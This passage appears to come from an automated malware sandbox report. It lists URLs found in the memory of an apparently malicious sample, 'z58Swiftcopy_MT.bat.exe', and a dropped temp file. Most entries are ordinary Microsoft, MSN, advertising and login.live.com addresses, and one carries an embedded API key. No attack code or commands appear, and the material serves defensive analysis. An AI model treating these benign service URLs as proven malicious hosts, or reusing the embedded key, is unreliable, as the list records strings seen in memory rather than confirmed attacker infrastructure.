                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://certs.godaddy.com/repository/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?bbc9af5ecc12954d59c63a1771114562
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://eb2.3lift.com/sync?
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BY3&Front
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4b&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?6e329cf6426f83c8ee02e2bc96bdb46d
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?d2c6e729d235d3f335d1d4751bb8eb91
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475954920.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475803985.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476050726.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476004168.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475853439.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ib.3lift.com/sync.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ib.adnxs.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480424352.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475707662.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475613079.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476004168.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
